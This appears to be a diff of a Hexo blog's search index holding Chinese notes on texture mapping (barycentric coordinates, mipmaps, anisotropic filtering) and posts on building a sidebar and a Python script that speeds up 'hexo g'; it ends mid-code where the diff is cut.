    ​图形管道流程需要大量并行运算,因此需要 GPU——用于执行图形管道计算的专用处理器。

    png

    ​GPU 的结构示意图。

    Texture mapping

    Texture Mapping

    Different Colors at Different Places?

    png

    ​对于兰伯特漫反射光照模型,其中的 $k_d$ 是怎么得来的?


    Surfaces are 2D

    表面都是 2D 的

    png

    Surface lives in 3D world space

    表面在 3D 空间中

    Every 3D surface point also has a place where it goes in the 2D image (texture).

    每个 3D 表面点在 2D 图像(纹理)中也有一个位置。


    Texture Applied to Surface

    Texture Applied to Surface

    png

    Each triangle “copies” a piece of the texture image to the surface

    每个三角形将纹理图像的一部分“复制”到表面


    Visualization of Texture Coordinates

    png

    Each triangle vertex is assigned a texture coordinate $(u,v)$

    每个三角形顶点分配一个纹理坐标 $(u,v)$

用颜色可视化每个顶点的纹理坐标:越红 $u$ 值越高,越绿 $v$ 值越高。


    Texture Applied to Surface

    png

    ​这个 UV 贴图是从美术人员那边获得的,咱们程序员不管这个!


    Textures applied to surfaces

    png

    ​一个贴图示例。


    Visualization of texture coordinates

    png

    ​这个模型由若干 UV 贴图平铺而成。


    Textures can be used multiple times!

    png

    ​这就需要美工人员整一个无缝贴图了!

    Lecture 09 Shading 3 (Texture Mapping Cont.)

    • Shading 3

      • Barycentric coordinates

        重心坐标

      • Texture queries

        纹理查询

      • Applications of textures

        纹理的应用

    Barycentric coordinates

    Interpolation Across Triangles

    三角形内插

    Why do we want to interpolate?

    为什么要进行插值呢?

    • Specify values at vertices

      指定顶点的值

    • Obtain smoothly varying values across triangles

在三角形内部获得平滑变化的值

    What do we want to interpolate?

    我们想要对什么样的值进行插值运算?

    • Texture coordinates, colors, normal vectors, …

      纹理坐标,颜色,法向量,…

    How do we interpolate?

    我们该如何进行插值呢?

    • Barycentric coordinates

      重心坐标


    Barycentric Coordinates

    重心坐标

    png

    ​三角形的坐标系统:

三角形 $\bigtriangleup_{ABC}$ 所在平面上的任意点都可以表示为三个顶点坐标的线性组合:$(x,y)=\alpha A+\beta B+\gamma C$,且 $\alpha+\beta+\gamma=1$

    ​额外的,Inside the triangle if all three coordinates are non-negative,如果这个点在三角形内,则 $\alpha,\beta,\gamma$ 均非负。

    png

    ​如果这个点恰好是 $A$ 点,则 $\alpha=1,\beta=0,\gamma=0$。


    png

对于三角形内部的点,其重心坐标 $\alpha,\beta,\gamma$ 由该点与三角形三个顶点的连线划分出的三个小三角形的面积比决定($A_A$ 表示顶点 $A$ 对面那块小三角形的面积):

$$\alpha=\frac{A_A}{A_A+A_B+A_C},\quad\beta=\frac{A_B}{A_A+A_B+A_C},\quad\gamma=\frac{A_C}{A_A+A_B+A_C}$$


    png

    ​如果这个点刚好是三角形的重心,则它的重心坐标为 $(\frac{1}{3},\frac{1}{3},\frac{1}{3})$。


    png

    ​$(x,y)$ 的重心坐标公式:

$$\begin{aligned}\alpha&=\frac{-(x-x_B)(y_C-y_B)+(y-y_B)(x_C-x_B)}{-(x_A-x_B)(y_C-y_B)+(y_A-y_B)(x_C-x_B)}\\\beta&=\frac{-(x-x_C)(y_A-y_C)+(y-y_C)(x_A-x_C)}{-(x_B-x_C)(y_A-y_C)+(y_B-y_C)(x_A-x_C)}\\\gamma&=1-\alpha-\beta\end{aligned}$$


    Using Barycentric Coordinates

    使用重心坐标

    Linearly interpolate values at vertices

    在顶点处线性插值

    png

这个用于插值的值 $V_A,V_B,V_C$ 可以是位置、纹理坐标、颜色、法线、深度、材质属性等,插值后即可在三角形内部得到平滑变化的值。

    ​However, barycentric coordinates are not invariant under projection!

如果三角形经过了投影变换,重心坐标会随之改变!所以插值应当用投影之前的三维坐标来计算(或者做透视校正插值)。
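
把这一节的公式直接落成屏幕空间的最小 Python 示意(照抄上面的公式,未做透视校正;函数名为示意假设):

def barycentric(x, y, ax, ay, bx, by, cx, cy):
    """按上面的公式计算 (x, y) 在三角形 ABC 中的重心坐标。"""
    alpha = (-(x - bx) * (cy - by) + (y - by) * (cx - bx)) / \
            (-(ax - bx) * (cy - by) + (ay - by) * (cx - bx))
    beta = (-(x - cx) * (ay - cy) + (y - cy) * (ax - cx)) / \
           (-(bx - cx) * (ay - cy) + (by - cy) * (ax - cx))
    return alpha, beta, 1.0 - alpha - beta

def interpolate(alpha, beta, gamma, va, vb, vc):
    """V = αV_A + βV_B + γV_C,可用于颜色、法线、uv 等任意逐顶点属性。"""
    return alpha * va + beta * vb + gamma * vc

三个坐标均非负时点在三角形内,这也可以顺便当作光栅化时的 inside 测试来用。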

    Texture queries

    Simple Texture Mapping: Diffuse Color

    简单纹理映射:漫反射颜色

for each rasterized screen sample (x, y):          # 对于每个光栅化出的屏幕样本 (x, y),通常取像素中心
    (u, v) = evaluate texture coordinate at (x, y) # 用重心坐标插值出 (x, y) 处的纹理坐标 (u, v)
    texcolor = texture.sample(u, v)                # 从纹理的 (u, v) 处采样颜色
    set sample's color to texcolor                 # 将样本颜色设为 texcolor,通常作为漫反射反照率 k_d(回想 Blinn-Phong 模型)
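
把这段伪代码落成可运行的 Python 示意(barycentric、interpolate 见上一节的示意代码,sample_bilinear 见下文双线性插值一节;参数的数据组织方式是这里假设的):

def shade_diffuse_texture(tri_xy, tri_uv, tex, framebuffer, samples):
    """tri_xy: 三个顶点的屏幕坐标;tri_uv: 对应的纹理坐标;samples: 待着色的 (x, y) 列表。"""
    (ax, ay), (bx, by), (cx, cy) = tri_xy
    (ua, va), (ub, vb), (uc, vc) = tri_uv
    for x, y in samples:
        a, b, g = barycentric(x, y, ax, ay, bx, by, cx, cy)
        u = interpolate(a, b, g, ua, ub, uc)   # 插值纹理坐标
        v = interpolate(a, b, g, va, vb, vc)
        framebuffer[y, x] = sample_bilinear(tex, u, v)   # 取出的颜色通常用作 k_d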

    Texture Magnification - Easy Case

    纹理贴图太小了怎么办?

    Generally don’t want this — insufficient texture resolution

    一般不希望这样-纹理分辨率不足

    A pixel on a texture — a texel

    我们把纹理贴图上的一个像素称之为 texel(纹理元素、纹素)

    png

    ​三种处理方法:

    Nearest 取最邻近的 texel

    Bilinear 双线性插值

Bicubic 双三次插值:利用待采样点周围 16 个纹素的值做三次插值,效果更好但开销更大


    Bilinear Interpolation

    双线性插值

    png

    ​假设我们想要对红点处 $(x,y)$ 求出其纹理颜色值 $f(x,y)$。

    png

考虑红点周围的 4 个纹素:先沿水平方向做两次线性插值得到 $u_0,u_1$,再沿竖直方向插值一次,得到 $f(x,y)=\mathrm{lerp}(t,u_0,u_1)$,其中 $\mathrm{lerp}(x,v_0,v_1)=v_0+x(v_1-v_0)$。


    png

    ​Bilinear interpolation usually gives pretty good results at reasonable costs.

    ​双线性插值通常以合理的成本给出相当好的结果。
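
按上面的 lerp 定义,双线性采样的一个最小 Python 示意如下(tex 假设为 (H, W, C) 的 numpy 数组,边界处理从简):

import numpy as np

def lerp(x, v0, v1):
    """课件中的线性插值:lerp(x, v0, v1) = v0 + x (v1 - v0)。"""
    return v0 + x * (v1 - v0)

def sample_bilinear(tex, u, v):
    h, w = tex.shape[:2]
    x = np.clip(u * w - 0.5, 0.0, w - 1.001)   # 换算到以纹素中心为整点的坐标
    y = np.clip(v * h - 0.5, 0.0, h - 1.001)
    x0, y0 = int(x), int(y)
    s, t = x - x0, y - y0                      # 水平、竖直方向上的小数偏移
    u0 = lerp(s, tex[y0, x0], tex[y0, x0 + 1])           # 水平方向插值两次
    u1 = lerp(s, tex[y0 + 1, x0], tex[y0 + 1, x0 + 1])
    return lerp(t, u0, u1)                               # 竖直方向再插值一次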


    Texture Magnification (hard case)

    如果纹理贴图太大了怎么办?

    png

纹理贴图相对屏幕过大(被缩小)导致的后果:近处有 Jaggies 锯齿,远处有 Moire 摩尔纹。原因是远处一个像素覆盖了大片纹理,信号频率远高于屏幕的采样频率。


    Screen Pixel “Footprint” in Texture

    纹理中的屏幕像素“足迹”

    png

    png

    ​近处的每个像素点包含的纹理贴图部分少,远处的每个像素点包含的纹理贴图部分多。


    Will Supersampling Do Antialiasing?

用超采样来做抗锯齿,行不行?

    png

    ​好使,但是渲染成本太高!


    Antialiasing — Supersampling?

    抗锯齿——超采样?

    Will supersampling work?

    超采样有效吗?

    • Yes, high quality, but costly

      是的,高质量,但是成本高

    • When highly minified, many texels in pixel footprint

当纹理被高度缩小时,一个像素的足迹(footprint)内包含许多纹素

    • Signal frequency too large in a pixel

      一个像素的信号频率太大

    • Need even higher sampling frequency

      需要更高的采样频率

Let's understand this problem in another way

    让我们用另一种方式来理解这个问题

    • What if we don’t sample?

      如果我们不采样怎么办?

    • Just need to get the average value within a range!

      只需要得到一个范围内的平均值!


    Mipmap

    Allowing (fast, approx., square) range queries

允许(快速、近似、方形的)范围查询

    png

    ​“Mip” comes from the Latin “multum in parvo”, meaning a multitude in a small space

“Mip”来自拉丁语“multum in parvo”,意为“方寸之间,容纳许多”(在很小的空间里放很多东西)

    ​多耗费 $\frac{1}{3}$ 的存储空间存储 Mipmap。

    png

Mip 金字塔:第 $D$ 层的分辨率是第 $D-1$ 层的一半,逐层递减。


    Computing Mipmap Level D

    png

    ​Estimate texture footprint using texture coordinates of neighboring screen samples

使用相邻屏幕采样点的纹理坐标,估算一个像素在纹理上的足迹(footprint)大小。

    png

    $$D=\log_2{L}$$

$$L=\max\left(\sqrt{\left(\frac{du}{dx}\right)^2+\left(\frac{dv}{dx}\right)^2},\sqrt{\left(\frac{du}{dy}\right)^2+\left(\frac{dv}{dy}\right)^2}\right)$$

    ​所使用的 Mipmap 的 level $D$ 由像素的纹理坐标与周边像素的纹理坐标之间的距离决定。
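
这个计算的一个最小 Python 示意如下(输入约定是这里假设的:四个参数分别为 du/dx、dv/dx、du/dy、dv/dy,且已乘上纹理分辨率):

import math

def mipmap_level(du_dx, dv_dx, du_dy, dv_dy):
    L = max(math.hypot(du_dx, dv_dx), math.hypot(du_dy, dv_dy))
    if L <= 1.0:
        return 0.0          # 足迹不超过一个纹素:放大情形,用第 0 层即可
    return math.log2(L)     # 连续的 D,可在 floor(D) 与 floor(D)+1 两层间做三线性插值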


    Visualization of Mipmap Level

    Mipmap 等级可视化

    png

    ​看上去一格一格的。


    Trilinear Interpolation

    三线性插值

    png

因此在第 $D$ 层和第 $D+1$ 层各做一次双线性插值,再对两层的结果按 $D$ 的小数部分做一次线性插值,即三线性插值。
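
一个三线性采样的 Python 示意如下(lerp、sample_bilinear 见上文双线性插值一节;tex_levels 假设为各层 Mipmap 组成的列表):

def sample_trilinear(tex_levels, u, v, D):
    """tex_levels[d]: 第 d 层 Mipmap;D 为连续的层级(假设 D >= 0)。"""
    d0 = min(int(D), len(tex_levels) - 2)
    t = D - d0
    c0 = sample_bilinear(tex_levels[d0], u, v)       # 第 D 层双线性插值
    c1 = sample_bilinear(tex_levels[d0 + 1], u, v)   # 第 D+1 层双线性插值
    return lerp(t, c0, c1)                           # 两层之间再做一次线性插值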


    Visualization of Mipmap Level

    Mipmap 等级可视化

    png

    ​插值后的 Mipmap level 看起来好极了!


    Mipmap Limitations

    Mipmap 的局限性

    png

直接使用 Point sampling(最近邻、不做插值),远处会出现明显的走样。

    png

我们把拉满的(512x)超采样结果当作正确答案,作为对比的基准。

    png

    ​插值完,由于 Mipmap 都是方形的,远处 Overblur 过于模糊。

    ​在标准的纹理映射中,每个像素都会在纹理上取样一个固定的方形区域,这可能导致在某些情况下出现失真或模糊。


    Anisotropic Filtering

    各向异性过滤

    png

    ​效果比 Mipmap 好使!

    png

    ​各向异性过滤,一种新的纹理映射算法。

    ​通过使用各向异性过滤(Anisotropic Filtering),可以根据像素与纹理之间的角度来动态调整采样区域的形状,以更好地适应纹理的拉伸和变形。这意味着在沿着纹理的方向上,采样区域可以被拉伸,而在垂直于纹理的方向上则可以被压缩,从而提供更准确的采样。

    png

    Ripmaps and summed area tables

• Can look up axis-aligned rectangular zones

  可以查询轴对齐的矩形区域

• Diagonal footprints still a problem

  对角线方向的足迹仍然是个问题

    Ripmaps 和 Summed Area Tables(SATs)都是用于纹理映射的技术,旨在提高在不同分辨率下的纹理采样质量。

1. Ripmaps:
  • Ripmaps 是一种分层存储纹理数据的结构:与 Mipmap 只能同时减半不同,它在水平和垂直两个方向上分别独立地减半分辨率,因此可以查询各向异性的轴对齐矩形区域,更好地匹配被拉伸的像素足迹,代价是大约 3 倍的额外存储。
2. Summed Area Tables (SATs):
  • Summed Area Table 是一种用于快速计算图像矩形区域内像素之和的数据结构:每个位置存储从左上角到该位置的所有像素之和,查询时取矩形四个角的值一加两减,即可在 O(1) 时间内得到任意矩形区域的总和或平均值(见本节后面的示意代码)。SATs 在纹理映射中通常用于快速求像素足迹内的纹理平均,从而更高效地采样。
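
下面是 Summed Area Table 的一个最小 Python 示意(假设 img 为单通道图像;build_sat、box_average 均为示意函数名):

import numpy as np

def build_sat(img):
    """sat[i, j] = img[:i, :j] 区域内的像素之和(多垫一行一列,便于处理边界)。"""
    sat = np.zeros((img.shape[0] + 1, img.shape[1] + 1))
    sat[1:, 1:] = img.cumsum(axis=0).cumsum(axis=1)
    return sat

def box_average(sat, r0, c0, r1, c1):
    """O(1) 查询矩形 [r0, r1) × [c0, c1) 的平均值:四角一加两减。"""
    total = sat[r1, c1] - sat[r0, c1] - sat[r1, c0] + sat[r0, c0]
    return total / ((r1 - r0) * (c1 - c0))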

    EWA filtering

    ​EWA(Elliptical Weighted Average)滤波是一种用于纹理映射的高级采样技术,旨在提供更准确和更高质量的纹理采样结果。

    EWA 滤波通过考虑采样点周围的纹理像素,并根据它们与采样点之间的距离和方向来加权平均这些像素的值。与传统的线性或双线性插值相比,EWA 滤波考虑了更多的信息,因此在处理各种纹理形状和方向时能够产生更好的结果。

    主要特点包括:

    1. 椭圆权重:EWA 滤波使用椭圆形的加权函数来确定每个纹理像素对最终采样值的影响程度。这种权重考虑了采样点与纹理像素之间的距离和方向,使得在各向异性纹理和非均匀采样情况下能够产生更准确的结果。
    2. 自适应核大小:EWA 滤波通过自适应地调整椭圆核的大小和形状来适应不同的采样情况。这意味着它可以在不同分辨率和形状的纹理上产生更一致和更准确的采样结果。
    3. 抗锯齿和抗混叠:由于 EWA 滤波考虑了周围像素的权重和方向,因此它在处理锯齿状边缘和纹理混叠时能够产生更平滑和更真实的效果。
    • Use multiple lookups

      使用多个查找

    • Weighted average

      加权平均数

    • Mipmap hierarchy still helps

      Mipmap 层次结构仍然有帮助

    • Can handle irregular footprints

      可以处理不规则的足迹

    png


    ​效果越好,代价是性能越差。

    ]]>
    @@ -2303,7 +2303,7 @@ /posts/Hexo-%E4%BE%A7%E8%BE%B9%E6%A0%8F/ - 前言

    ​没错!我又开始瞎鼓捣我的博客了!本次更新了侧边栏功能!便于在正文旁边加点辅助信息,提升阅读体验。

    布局

    post_centent

    post_centent.ejs 的内容如下:

<div class="post-content">
    <article class="post-content-info">
        <%- page.content %>
        <%- partial('widget/comments'); %>
    </article>
    <% if(page.aside != false) { %>
        <%- partial('_partial/post_aside'); %>
    <% } %>
</div>

    ​一个 <div class="post-content"> 存储主体信息。

    • <article class="post-content-info"> 正文内容。
    • <%- partial('_partial/post_aside'); %> 侧边栏内容。
      • 如果文章头的参数 aside 设为 false,不创建侧边栏。

    ​当屏幕宽度大于 960px 时,.post-content 使用弹性布局,将侧边栏放在正文内容右边:

    display: flex;
    margin: -100px auto 95px;
    width: 100%;
    justify-content: center;

​当屏幕宽度小于 960px 时,将“侧边栏”放在正文内容下边(像 butterfly 那么做):

    flex-direction: column;

    post_aside

    post_aside.ejs 下的内容(简略):

<div class="aside">
    <%- js('js/widget/aside.js'); %>
    <script>
        showAside();
    </script>

    <div class="aside-top">
        <div class="aside-top-about aside-card">
            ...
        </div>
    </div>

    <% if(page.series) { %>
        <div class="aside-top-series aside-card">
            ...
        </div>
    <% } %>

    <div class="aside-bottom">
        <% if(page.toc) { %>
            ...
            <div class="aside-bottom-toc aside-card">
                ...
            </div>
        <% } %>
    </div>
</div>

    <div class="aside"> 下有:

    • <div class="aside-top">,这个是相对布局:
    position: relative;
    z-index: 2;
    margin-left: 20px;
    width: min(260px, 20vw);
    • <div class="aside-bottom">,这个是 sticky 布局,主要是让视图滚动时也能显示目录。
    position: sticky;
    top: 80px;
    margin-left: 20px;
    width: min(260px, 20vw);

    aside-card

    width: calc(100% - 20px);
    border-radius: 10px;
    background: var(--background-primary);
    box-shadow: 0 1px 3px hsla(0, 0%, 7%, 0.1);
    padding: 10px;
    border: 1px solid rgba(18, 24, 58, 0.06);
    transition: background 0.3s ease-out;

    ​写一个侧边栏卡片样式。

    Series 标签

    ​我设计了一个新的文章属性:series!据我所知,这个功能还是我独创的。

    series: Hexo

    ​这个 series 的值必须在 tags 里存在,算是一个文章的系列标签,或是我学习一门重要技术时探索的时间线。

<ol class="series">
    <% let serialNumber = 0; %>
    <% let seriesCount = 0; %>
    <% let find = false; %>
    <% site.posts.sort('date').forEach(function(post) { %>
        <% if (post.series === page.series) { %>
            <% seriesCount += 1; %>
            <% if (!find) { serialNumber += 1; } %>
            <% if (post.path === page.path) { %>
                <% find = true; %>
                <li class="series-item active">
                    <a class="series-link active" href="/<%= post.path %>">
                        &nbsp;&nbsp;<span class="text"><%= post.title %></span>
                    </a>
                </li>
            <% } else { %>
                <li class="series-item">
                    <a class="series-link" href="/<%= post.path %>">
                        &nbsp;&nbsp;<span class="text"><%= post.title %></span>
                    </a>
                </li>
            <% } %>
        <% } %>
    <% }); %>
</ol>

    ​渲染时会查找所有跟 series 相同的文章并按时间顺序排列后放到侧边栏中,便于读者快速找到其它相关文章。

    自定义侧边栏

​现在文章可以通过 JS 自定义侧边栏了!原理就是使用 JS 往 <div class="aside-top"> 和 <div class="aside-bottom"> 下面插入 <div class="aside-card">。

    ​由于渲染顺序的关系,只能在文章属性的 inject.bottom 里设置相应的 JS 逻辑(这个功能是抄 butterfly 的)(虽然把逻辑放到前端会拖慢网页加载速度,但我觉得这么写不会显得那么屎山,而且就这么点代码问题也不大你说是不是)。

    inject:
    bottom:
    - <script type="text/javascript" src="test_aside.js"></script>
function createNode_1() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("长安古意"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("span");
    e_3.appendChild(document.createTextNode("唐·卢照邻"));
    e_1.appendChild(e_3);
    e_0.appendChild(e_1);
    var e_4 = document.createElement("p");
    e_4.appendChild(document.createTextNode("\n长安大道连狭斜,"));
    var e_5 = document.createElement("br");
    e_4.appendChild(e_5);

    ...

    e_4.appendChild(document.createTextNode("飞来飞去袭人裾。"));
    var e_72 = document.createElement("br");
    e_4.appendChild(e_72);
    e_0.appendChild(e_4);
    return e_0;
}

function createNode_2() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("春江花月夜"));
    e_1.appendChild(e_2);
    var e_3 = document.createElement("span");
    e_3.appendChild(document.createTextNode("唐·张若虚"));
    e_1.appendChild(e_3);
    e_0.appendChild(e_1);
    var e_4 = document.createElement("p");
    e_4.appendChild(document.createTextNode("\n春江潮水连海平,"));
    var e_5 = document.createElement("br");
    e_4.appendChild(e_5);

    ...

    e_4.appendChild(document.createTextNode("落月摇情满江树。"));
    var e_40 = document.createElement("br");
    e_4.appendChild(e_40);
    e_0.appendChild(e_4);
    return e_0;
}

function createNode_3() {
    var e_0 = document.createElement("div");
    e_0.setAttribute("class", "poem aside-card");
    var e_1 = document.createElement("div");
    e_1.setAttribute("class", "top");
    var e_2 = document.createElement("h1");
    e_2.appendChild(document.createTextNode("音乐"));
    e_1.appendChild(e_2);
    e_0.appendChild(e_1);   // 补上这一句,否则标题区不会被加入卡片
    var e_3 = document.createElement("div");
    const ap = new APlayer({
        container: e_3,
        audio: [{
            name: '梦之津渡',
            artist: '啃书',
            url: '/musics/梦之津渡.mp3',
            cover: '/musics/梦之津渡.jpg'
        }]
    });
    e_0.appendChild(e_3);
    return e_0;
}

$(document).ready(function() {
    document.querySelector(".aside-top").appendChild(createNode_1());
    document.querySelector(".aside-bottom").appendChild(createNode_2());
    var parentElement = document.querySelector(".aside-bottom");
    var firstChild = parentElement.firstChild;
    parentElement.insertBefore(createNode_3(), firstChild);
});

    ​这段代码可以让你在侧边栏感受中华优秀传统文化!还可以听听音乐!

    ]]>
    @@ -2386,7 +2386,7 @@ /posts/Hexo-%E5%86%99%E7%82%B9%E5%B7%A5%E5%85%B7%E5%8A%A0%E5%BF%AB%20hexo%20g%20%E7%9A%84%E9%80%9F%E5%BA%A6/ - 前言

    ​博客里 bb 了太多的东西,导致每次执行 hexo cl 后再执行 hexo g 速度都特别慢,而且还会出现 EMFILE: too many open files 这种编译失败的错误!而 问题解答 | Hexo 这个解决方案只对 Linux 有效。必须找个办法修复😡!

​不幸的是,hexo s 还是这么慢……

    解决方案

    ​经过排查,应该是 source/ 下的文件太多了……每次 hexo g 都会处理大量不需要编译的无关文件(没有用图床的弊端),我们只需要让 hexo g 处理 .md 文件就行。

    ​所以我想的是:

    1. source/ 下的无关文件先移动到某个临时文件夹;
    2. 执行 hexo cl,然后执行 hexo g 编译 .md 文件;
3. 再把这些无关文件移动回 source/ 和 public/ 下的对应位置即可。

    代码

    ​在博客文件夹根目录下创建一个 ./tools 文件夹,里面创建一个 quick_complie.py,里面写上这些神奇代码!

    python

    导入相关库、定义变量

    import os
    import shutil
    from tqdm import tqdm
    import subprocess
    import yaml

    ignore_folder = ['musics'] # 不处理 source/musics 这个文件夹
    ignore_type = ['md', 'ejs'] # 不处理 .md 和 .ejs 类型的文件

    前处理

    ​下面这段代码会将 source/ 下不需要 hexo g 处理的文件移动到 temp/ 下。

def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
        # 构建源文件/文件夹的完整路径
        src_item = os.path.join(src, item)
        # 构建目标文件/文件夹的完整路径
        dst_item = os.path.join(dst, item)

        # 如果是文件夹,则递归地处理该文件夹
        if os.path.isdir(src_item):
            move_non_md_files(src_item, dst_item)
        # 如果是文件且不属于 ignore_type 中的类型,则移动文件
        elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
            shutil.move(src_item, dst)


print("处理文件……")
if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
        item_path = os.path.join('../source', item)
        # 判断是否为文件夹
        if os.path.isdir(item_path):
            try:
                move_non_md_files(item_path, os.path.join('../temp', item))
            except Exception as e:
                print(item_path + ":", e)

print("完成!")

    hexo cl & hexo g

    ​使用 python 调用 hexo clhexo g 命令。

    print("hexo cl……")
    print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")
    print("hexo g……")
    print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
    print("完成!")

    后处理

    ​下面这段代码会将 temp/ 下的文件拷贝回 source/public/ 下的对应位置,最后删除 temp/

    后处理 _posts

​对于 _posts 下的文件,temp/ 和 public/ 的路径不是一一对应的,要按照对应的规则拷贝。

print("后处理 _post 文件……")

md_list = []
for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
        md_list.append(item)

for item in tqdm(md_list):
    try:
        # 读取 Markdown 文件内容
        with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
            content = file.read()
        # 解析 YAML 头部信息
        yaml_header, body = content.split('---\n', 2)[1:]
        yaml_data = yaml.safe_load(yaml_header)
        source_folder = '../temp/_posts/' + item[:-3]
        destination_folder = ('../public/' +
                              str(yaml_data['date'].year).zfill(2) + '/' +
                              str(yaml_data['date'].month).zfill(2) + '/' +
                              str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
        shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): " + item + ":", e)
    try:
        shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
print("完成!")

    后处理其它文件

​对于其它文件,temp/ 和 public/ 的路径是一一对应的,直接按原路径拷贝回去即可。最后把临时文件夹 temp/ 删了。

print("后处理其它文件……")
for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
        item_path = os.path.join('../temp', item)
        # 判断是否为文件夹
        if os.path.isdir(item_path):
            try:
                shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../public', item) + ":", e)
            try:
                shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../source', item) + ":", e)

if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

print("完成!")

    完整代码

import os
import shutil
from tqdm import tqdm
import subprocess
import yaml

ignore_folder = ['musics']
ignore_type = ['md', 'ejs']


def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
        # 构建源文件/文件夹的完整路径
        src_item = os.path.join(src, item)
        # 构建目标文件/文件夹的完整路径
        dst_item = os.path.join(dst, item)

        # 如果是文件夹,则递归地处理该文件夹
        if os.path.isdir(src_item):
            move_non_md_files(src_item, dst_item)
        # 如果是文件且不属于 ignore_type 中的类型,则移动文件
        elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
            shutil.move(src_item, dst)


print("处理文件……")
if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
        item_path = os.path.join('../source', item)
        # 判断是否为文件夹
        if os.path.isdir(item_path):
            try:
                move_non_md_files(item_path, os.path.join('../temp', item))
            except Exception as e:
                print(item_path + ":", e)

print("完成!")

#####################################################

print("hexo cl……")
print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("完成!")
print("hexo g……")
print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("完成!")

######################################################

## 后处理 _post 文件

print("后处理 _post 文件……")

md_list = []
for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
        md_list.append(item)

for item in tqdm(md_list):
    try:
        # 读取 Markdown 文件内容
        with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
            content = file.read()
        # 解析 YAML 头部信息
        yaml_header, body = content.split('---\n', 2)[1:]
        yaml_data = yaml.safe_load(yaml_header)
        source_folder = '../temp/_posts/' + item[:-3]
        destination_folder = ('../public/' +
                              str(yaml_data['date'].year).zfill(2) + '/' +
                              str(yaml_data['date'].month).zfill(2) + '/' +
                              str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
        shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): " + item + ":", e)
    try:
        shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
print("完成!")

## 后处理其它文件

print("后处理其它文件……")
for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
        item_path = os.path.join('../temp', item)
        # 判断是否为文件夹
        if os.path.isdir(item_path):
            try:
                shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../public', item) + ":", e)
            try:
                shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../source', item) + ":", e)

if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

print("完成!")

    调用 python 文件

    ​写一个 .bat 文件快速调用 quick_complie.py

    @echo off
    python quick_complie.py
    echo 按任意键继续……
    pause
    exit
    ]]>
    + 前言

    ​博客里 bb 了太多的东西,导致每次执行 hexo cl 后再执行 hexo g 速度都特别慢,而且还会出现 EMFILE: too many open files 这种编译失败的错误!而 问题解答 | Hexo 这个解决方案只对 Linux 有效。必须找个办法修复😡!

    ​不幸运地是,hexo s 还是这么慢……

    解决方案

    ​经过排查,应该是 source/ 下的文件太多了……每次 hexo g 都会处理大量不需要编译的无关文件(没有用图床的弊端),我们只需要让 hexo g 处理 .md 文件就行。

    ​所以我想的是:

    1. source/ 下的无关文件先移动到某个临时文件夹;
    2. 执行 hexo cl,然后执行 hexo g 编译 .md 文件;
    3. 再把这些无关文件移动回 source/public/ 的特定位置即可。

    代码

    ​在博客文件夹根目录下创建一个 ./tools 文件夹,里面创建一个 quick_complie.py,里面写上这些神奇代码!

    python

    导入相关库、定义变量

    1
    2
    3
    4
    5
    6
    7
    8
    import os
    import shutil
    from tqdm import tqdm
    import subprocess
    import yaml

    ignore_folder = ['musics'] # 不处理 source/musics 这个文件夹
    ignore_type = ['md', 'ejs'] # 不处理 .md 和 .ejs 类型的文件

    前处理

    ​下面这段代码会将 source/ 下不需要 hexo g 处理的文件移动到 temp/ 下。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # 遍历源文件夹中的所有文件和子文件夹
    for item in os.listdir(src):
    # 构建源文件/文件夹的完整路径
    src_item = os.path.join(src, item)
    # 构建目标文件/文件夹的完整路径
    dst_item = os.path.join(dst, item)

    # 如果是文件夹,则递归地复制文件夹
